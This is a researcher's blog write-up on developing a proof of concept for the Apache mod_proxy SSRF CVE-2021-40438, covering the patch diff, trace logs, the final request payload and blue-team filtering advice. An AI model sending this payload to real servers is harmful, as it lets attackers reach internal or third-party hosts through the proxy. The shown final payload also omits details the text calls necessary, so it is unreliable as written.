Building a POC for CVE-2021-40438

If you’re blue team and want to know what an exploit for this looks like for filtering purposes I’ve added that information for you in the conclusions section.

While working on one of the Insane machines on Hack The Box I came across a scenario in which the SSRF in mod_proxy of apache2 could have potentially been the way.

The apache2 version used for testing throughout this writeup is

Server version: Apache/2.4.48 (Debian)
Server built: 2021-08-12T09:37:43

The relevant bit of the configuration is this

<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName firzenkali
        DocumentRoot /var/www/html

        LogLevel notice proxy:trace8

        ErrorLog ${APACHE_LOG_DIR}/firzenkali_error.log
        CustomLog ${APACHE_LOG_DIR}/firzenkali_access.log combined

        ProxyPass / "http://localhost:8000/"
        ProxyPassReverse / "http://localhost:8000/"
</VirtualHost>

The information readily available on CVE-2021-40438 is pretty slim, only giving a vague description:

https://nvd.nist.gov/vuln/detail/CVE-2021-40438
A crafted request uri-path can cause mod_proxy to forward the
request to an origin server choosen by the remote user. This issue
affects Apache HTTP Server 2.4.48 and earlier.

From there one can eventually find the relevant commits when reading through the different entries on mailing lists.

The relevant commit that fixes this issue is r1892814.
It’s information helpfully says:

mod_proxy: Faster unix socket path parsing in the "proxy:" URL.

So that everyone can tell right away that it’s a security patch.

The Patch

So what has been changed? Here’s the relevant diff:

--- httpd/httpd/trunk/modules/proxy/proxy_util.c	2021/09/02 12:33:49	1892813
+++ httpd/httpd/trunk/modules/proxy/proxy_util.c	2021/09/02 12:37:02	1892814
@@ -2274,8 +2274,8 @@ static void fix_uds_filename(request_rec
     if (!r || !r->filename) return;
 
     if (!strncmp(r->filename, "proxy:", 6) &&
-            (ptr2 = ap_strcasestr(r->filename, "unix:")) &&
-            (ptr = ap_strchr(ptr2, '|'))) {
+            !ap_cstr_casecmpn(r->filename + 6, "unix:", 5) &&
+            (ptr2 = r->filename + 6 + 5, ptr = ap_strchr(ptr2, '|'))) {
         apr_uri_t urisock;
         apr_status_t rv;
         *ptr = '\0';
         rv = apr_uri_parse(r->pool, ptr2, &urisock);
         if (rv == APR_SUCCESS) {
             char *rurl = ptr+1;
             char *sockpath = ap_runtime_dir_relative(r->pool, urisock.path);
             apr_table_setn(r->notes, "uds_path", sockpath);
             *url = apr_pstrdup(r->pool, rurl); /* so we get the scheme for the uds */
             /* r->filename starts w/ "proxy:", so add after that */
             memmove(r->filename+6, rurl, strlen(rurl)+1);
             ap_log_rerror(APLOG_MARK, APLOG_TRACE2, 0, r,
                     "*: rewrite of url due to UDS(%s): %s (%s)",
                     sockpath, *url, r->filename);
         }
         else {
             *ptr = '|';
         }
     }
 }

This code path will now only trigger if the “unix:” string is at the start of the proxy url. It would previously search through the whole url for it using strstr().

When using mod_proxy it will usually rewrite urls like so:

 mod_proxy.c(683): [client 127.0.0.1:56772] AH03461: attempting to match URI path '/test' against prefix '/' for proxying
 mod_proxy.c(778): [client 127.0.0.1:56772] AH03464: URI path '/test' matches proxy handler 'proxy:http://localhost:8000/test'
 proxy_util.c(2244): [client 127.0.0.1:56772] http: found worker http://localhost:8000/ for http://localhost:8000/test?param1=test1&amp;param2=test2
 mod_proxy.c(1258): [client 127.0.0.1:56772] AH01143: Running scheme http handler (attempt 0)
 proxy_util.c(2438): AH00942: http: has acquired connection for (localhost)
 proxy_util.c(2494): [client 127.0.0.1:56772] AH00944: connecting http://localhost:8000/test?param1=test1&amp;param2=test2 to localhost:8000
 proxy_util.c(2717): [client 127.0.0.1:56772] AH00947: connected /test?param1=test1&amp;param2=test2 to localhost:8000

Line 2 of the output shows why it’s looking for the “proxy:” string at the beginning of the URL.


Since the unpatched version of the code helpfully looks everywhere for “unix:” it can be appended as a parameter for example and will still trigger the UDS (Unix Domain Socket) code path above.

 mod_proxy.c(683): [client 127.0.0.1:60996] AH03461: attempting to match URI path '/test' against prefix '/' for proxying
 mod_proxy.c(778): [client 127.0.0.1:60996] AH03464: URI path '/test' matches proxy handler 'proxy:http://localhost:8000/test'
 proxy_util.c(2244): [client 127.0.0.1:60996] http: found worker http://localhost:8000/ for http://localhost:8000/test?unix:|test
 proxy_util.c(2223): [client 127.0.0.1:60996] *: rewrite of url due to UDS(/var/run/apache2/): test (proxy:test)
 mod_proxy.c(1258): [client 127.0.0.1:60996] AH01143: Running scheme http handler (attempt 0)
 [client 127.0.0.1:60996] AH01144: No protocol handler was valid for the URL / (scheme 'http'). If you are using a DSO version of mod_proxy, make sure the proxy submodules are included in the configuration using LoadModule.

Note that the output on line 4 here corresponds to line 23 in the code segment above. So we’ve successfully triggered the code path that was altered in the patch.

How to exploit?

At this point the vulnerable code path can be triggered, but it’s not clear what that actually let’s us do that we’re not supposed to be able to.
Well, actually that’s not strictly true. The output on line 6 shows that the server tries to use the domain socket, but can’t figure out which protocol handler to use.

Another curious bit of the output is line 4. Where does “/var/run/apache2” come from? A good bet seems to be line 17 of the code.

char *sockpath = ap_runtime_dir_relative(r->pool, urisock.path);
apr_table_setn(r->notes, "uds_path", sockpath);

This seems to set the sockpath to some path relative to some directory. So let’s see if we can get a bit further (at least in understanding) by altering the request a bit. Let’s request a UDS called “testsocket” and also explicitly specify our URL scheme after the pipe.

GET /?unix:testsocket|http://test/ HTTP/1.1

Sending this request produces the following output which seems a lot more interesting.

 mod_proxy.c(683): [client 127.0.0.1:56196] AH03461: attempting to match URI path '/' against prefix '/' for proxying
 mod_proxy.c(778): [client 127.0.0.1:56196] AH03464: URI path '/' matches proxy handler 'proxy:http://localhost:8000/'
 proxy_util.c(2244): [client 127.0.0.1:56196] http: found worker http://localhost:8000/ for http://localhost:8000/?unix:testsocket|http://test/
 proxy_util.c(2223): [client 127.0.0.1:56196] *: rewrite of url due to UDS(/var/run/apache2/testsocket): http://test/ (proxy:http://test/)
 mod_proxy.c(1258): [client 127.0.0.1:56196] AH01143: Running scheme http handler (attempt 0)
 proxy_util.c(2438): AH00942: http: has acquired connection for (localhost)
 proxy_util.c(2494): [client 127.0.0.1:56196] AH00944: connecting http://test/ to test:80
 proxy_util.c(2530): [client 127.0.0.1:56196] AH02545: http: has determined UDS as /var/run/apache2/testsocket
 proxy_util.c(2717): [client 127.0.0.1:56196] AH00947: connected / to httpd-UDS:0
 (2)No such file or directory: AH02454: http: attempt to connect to Unix domain socket /var/run/apache2/testsocket (localhost) failed
 [client 127.0.0.1:56196] AH01114: HTTP: failed to make connection to backend: httpd-UDS
 proxy_util.c(2453): AH00943: http: has released connection for (localhost)

Firstly note how on line 4 the “testsocket” string has been appended to the path from before, that means we actually control the second argument passed into the ap_runtime_dir_relative function.

Secondly on line 5 we can see that now that we’ve specified the url scheme apache uses a corresponding handler.

And lastly notice how on line 10 connecting to the unix domain socket fails.
At this point I was trying all kinds of things to try and trick or just to find a usable domain socket, but couldn’t find any.

After a while I figured that using a domain socket is probably a dead end and decided to look where the decision to use a domain socket is being made. The relevant code in a vulnerable version can be found here.

    uds_path = (*worker->s->uds_path ? worker->s->uds_path : apr_table_get(r->notes, "uds_path"));
    if (uds_path) {
        if (conn->uds_path == NULL) {
            /* use (*conn)->pool instead of worker->cp->pool to match lifetime */
            conn->uds_path = apr_pstrdup(conn->pool, uds_path);
        }
        if (conn->uds_path) {
            ap_log_rerror(APLOG_MARK, APLOG_DEBUG, 0, r, APLOGNO(02545)
                         "%s: has determined UDS as %s",
                         uri->scheme, conn->uds_path);
        }
        else {
            /* should never happen */
            ap_log_rerror(APLOG_MARK, APLOG_DEBUG, 0, r, APLOGNO(02546)
                         "%s: cannot determine UDS (%s)",
                         uri->scheme, uds_path);

        }
        /*
         * In UDS cases, some structs are NULL. Protect from de-refs
         * and provide info for logging at the same time.
         */
        if (!conn->addr) {
            apr_sockaddr_t *sa;
            apr_sockaddr_info_get(&sa, NULL, APR_UNSPEC, 0, 0, conn->pool);
            conn->addr = sa;
        }
        conn->hostname = "httpd-UDS";
        conn->port = 0;
    }
    else {

So the first thing for me was to realize that I can correlate some of the lines of code here to output in the log.
Line 2598 here corresponsd to line 8 in the log and 2617 sets the hostname that shows up in line 11 of the log.

That means we’re probably looking at the correct piece of code here.
So what does it actually do?

In line 2590 it will either grab the path that’s cached in the worker, or if there isn’t one, take the one stored in the request notes as “uds_path”. We already know from observing the previous output that we can influence what this uds_path is. Next it checks if the uds_path variable has been set and if so goes into the code path above.

Since the uds_path variable here is just a C-string the only way to avoid this code path is by it being NULL. But we know where it is being set, so maybe there’s a way to actually get the uds_path to be NULL.

How uds_path is being set

From the code of the patch we know that the path is being assigned by ap_runtime_dir_relative(). I’ve linked to the code in a relevant version here, but there’s nothing particularly interesting here. It’s mainly a wrapper connecting the information stored in the pool and resolving it to make a call to apr_filepath_merge() which does the real bulk of the work here.

I’m snipping out most of the function because it’s quite big, but I encourage you to have a look yourself. Keep in mind that we want the path to not actually be constructed, so we’re mostly interested in error conditions.

    rootlen = strlen(rootpath);
    maxlen = rootlen + strlen(addpath) + 4; /* 4 for slashes at start, after
                                             * root, and at end, plus trailing
                                             * null */
    if (maxlen > APR_PATH_MAX) {
        return APR_ENAMETOOLONG;
    }
    path = (char *)apr_palloc(p, maxlen);

As shown in lines 153-155, an easy option to cause an error might be to request an excessively long filename for the UDS socket. An important aside here is, that no error checking is performed when using the return value of this path construction.

char *sockpath = ap_runtime_dir_relative(r->pool, urisock.path);
apr_table_setn(r->notes, "uds_path", sockpath);
*url = apr_pstrdup(r->pool, rurl); /* so we get the scheme for the uds */
             /* r->filename starts w/ "proxy:", so add after that */
memmove(r->filename+6, rurl, strlen(rurl)+1);

The sockpath returned from ap_runtime_dir_relative() is being written straight into the request notes. So if we can cause this error condition we might be able to cause the request filename to be rewritten, while keeping the value for the UDS to NULL. So let’s just give that a try.

Success

Here is the request “payload” I’ve arrived at through the journey above.

GET /?unix|http://google.com/ HTTP/1.1

And here is the corresponding log output.

 mod_proxy.c(683): [client 127.0.0.1:56290] AH03461: attempting to match URI path '/' against prefix '/' for proxying
 mod_proxy.c(778): [client 127.0.0.1:56290] AH03464: URI path '/' matches proxy handler 'proxy:http://localhost:8000/'
 proxy_util.c(2244): [client 127.0.0.1:56290] http: found worker http://localhost:8000/ for http://localhost:8000/?unix|http://google.com/
 proxy_util.c(2223): [client 127.0.0.1:56290] *: rewrite of url due to UDS((null)): http://google.com/ (proxy:http://google.com/)
 mod_proxy.c(1258): [client 127.0.0.1:56290] AH01143: Running scheme http handler (attempt 0)
 proxy_util.c(2438): AH00942: http: has acquired connection for (localhost)
 proxy_util.c(2494): [client 127.0.0.1:56290] AH00944: connecting http://google.com/ to google.com:80
 proxy_util.c(2717): [client 127.0.0.1:56290] AH00947: connected / to google.com:80
 proxy_util.c(3151): http: fam 2 socket created to connect to localhost
 proxy_util.c(3183): AH02824: http: connection established with 172.217.19.78:80 (localhost)
 proxy_util.c(3369): AH00962: http: connection complete to 172.217.19.78:80 (google.com)
 proxy_util.c(2453): AH00943: http: has released connection for (localhost)

Things to note here are especially line 4 which confirms that the UDS has been set to NULL. And the missing “has determined UDS as” line from the log. This confirms that everything has gone according to plan and, as expected, the webserver helpfully connects to google for us and forwards their response back.

Conclusion and Remarks

It was an interesting journey to try and figure out how to actually exploit this vulnerability, especially since, aside from the code, there wasn’t a lot of information readily available.

The lack of information seems to mainly be due to the Apache team’s policy to not release information on potential exploits. And I’m willing to speculate that the commit messages were deliberately not mentioning security issues as well.

I can understand where they are coming from, but ultimately it seems futile to me and does make other people’s work harder. The whole process outlined above took me about 6-7 hours to arrive at a working exploit and I can’t imagine I’m the first one to do it.

I hope that writing this up can help other researchers follow my process here, can motivate people to update their damn systems and can help people on blue teams to mitigate some of the risk by filtering out potential payloads if updating isn’t an option for whatever reason.

If you’re trying to replicate this and run into issues, try restarting apache.
The uds_path is cached in the workers and failed attempts might have cached bad values that prevent exploitation.

If you’re on a blue team and want to protect against this you can look for requests including the string “unix:” followed by a pipe “|” after the argument separator “?”. If the pipe isn’t part of the arguments it will get url encoded and will prevent the vulnerable code path from triggering, hence that restriction. The “unix:” string can be before or after the arguments, but has to be before the pipe.
The long socket name may or may not be required depending on the URL scheme. I haven’t tested this for all possible ones.

5 Comments

  1. Hello,

    Nice POC !

    However i found that mod_proxy caches the IP address of the proxy connection : if your ProxyPass has been used, the request with |http://www.google.com/ will be directed to this IP, with Host: http://www.google.com in header. If it has not been used before attack, then the IP address of Google will be cached, and a normal URL will be directed at Google.com !

  2. Firzen – this is timely and thorough analysis, which is helping many sites to be secured from the potential attack and the teams to re-think the web-server choice. Please continue writing & sharing. Much helpful.

Leave a Reply to Yang Yu Cancel reply

Your email address will not be published. Required fields are marked *